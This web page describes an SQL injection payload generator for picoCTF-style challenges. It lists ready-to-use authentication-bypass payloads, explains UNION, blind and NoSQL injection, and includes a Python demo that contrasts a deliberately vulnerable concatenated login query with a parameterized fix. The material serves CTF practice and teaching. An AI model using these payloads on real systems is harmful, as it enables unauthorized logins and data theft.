SQL Injection Payload Generator
Generate ready-to-use SQL injection payloads for the most common attack types. Pick a technique, configure the target database and parameters, and copy the output directly into a form field or curl command. Covers MySQL, PostgreSQL, SQLite, and MSSQL.
Payloads (database tag shown where a payload is database-specific):

- OR tautology: `' OR 1=1-- -`
- OR tautology (hash comment), MySQL: `' OR 1=1#`
- Log in as admin (comment out password): `admin'-- -`
- String tautology (no comment needed): `' OR 'a'='a`
- Parentheses variant: `') OR ('1'='1`
- Double-quote variant: `" OR "1"="1`
- admin with always-true OR: `admin' OR '1'='1`
- Concat split bypass (OR/keyword blocked), SQLite and PostgreSQL: `adm'||'in` splits the word admin across `||` so the literal word never appears in the input. Works in SQLite and PostgreSQL when OR is filtered.
Usage
Paste the payload into the username field and enter anything for the password. The comment sequence (`-- -`) discards the rest of the query, including the password check. Enable the ROT13 option for challenges where the server ROT13-decodes your input before querying (Irish-Name-Repo 3).
SQL injection in CTF challenges
SQL injection (SQLi) is consistently one of the most tested vulnerability categories in picoCTF and similar competitions. The root cause is always the same: user-supplied input is concatenated directly into a SQL query string instead of being passed as a bound parameter. The database then executes the attacker input as SQL syntax.
Auth bypass is the entry point for most beginner challenges. Entering a payload like ' OR 1=1-- - as the username makes the WHERE clause always true, granting login without a valid password. The -- - comments out the rest of the query including the password check.
UNION extraction appends a second SELECT to the original query and injects its output into the page. You first probe the column count with ORDER BY, find which column reflects to the page, then use that position to pull table names, column names, and finally the flag data.
Blind injection applies when query results are never echoed. Boolean-based blind injection compares two response shapes (one with a true condition, one with false) to infer character values one at a time. Time-based blind injection uses SLEEP() or equivalent to signal true/false via response delay. Both techniques are tedious to run manually; sqlmap automates them.
NoSQL injection targets document stores like MongoDB. Instead of SQL syntax, you inject query operators (`$ne`, `$gt`, `$regex`) when the server deserializes the POST body directly into a query object without validation.
For a full technique walkthrough with picoCTF challenge examples at every level, see the SQL Injection for CTF guide.
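To make the root cause concrete, here is an added example (not part of this tool or of picoCTF) that runs the `' OR 1=1-- -` and `adm'||'in` payloads from above against two SQLite login checks: one that concatenates input into the query string, and the bound-parameter version that closes the bug. The users table and credentials are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with a single admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_concatenated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Vulnerable: the input is spliced into the SQL text, so a quote in the
    # username ends the string literal and the rest is parsed as SQL.
    query = (
        f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    try:
        (count,) = conn.execute(query).fetchone()
    except sqlite3.Error:
        # Malformed injection attempts surface as syntax errors; treat as failed login.
        return False
    return count > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Fixed: the driver binds the values separately from the SQL text, so
    # quotes, comment sequences and || are compared as plain characters.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    (count,) = conn.execute(query, (username, password)).fetchone()
    return count > 0


if __name__ == "__main__":
    db = make_db()
    for payload in ["' OR 1=1-- -", "admin'-- -", "adm'||'in"]:
        print(
            f"{payload!r:20} concatenated={login_concatenated(db, payload, 'wrong')} "
            f"parameterized={login_parameterized(db, payload, 'wrong')}"
        )
```

The concatenated check accepts the tautology payloads with any password, while the parameterized check only ever matches a real row.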
Challenges that use this tool
- Sql Map1 · picoCTF 2026 · Web Exploitation · Medium
- No Sql Injection · picoCTF 2024 · Web Exploitation · Medium
- More SQLi · picoCTF 2023 · Web Exploitation · Medium
- SQLiLite · picoCTF 2022 · Web Exploitation · Medium
- Web Gauntlet 2 · picoCTF 2021 · Web Exploitation · Medium
- Web Gauntlet 3 · picoCTF 2021 · Web Exploitation · Medium
- Web Gauntlet · picoCTF 2020 Mini-Competition · Web Exploitation · Medium
- Irish-Name-Repo 1 · picoCTF 2019 · Web Exploitation · Medium
- Irish-Name-Repo 2 · picoCTF 2019 · Web Exploitation · Medium
- Irish-Name-Repo 3 · picoCTF 2019 · Web Exploitation · Medium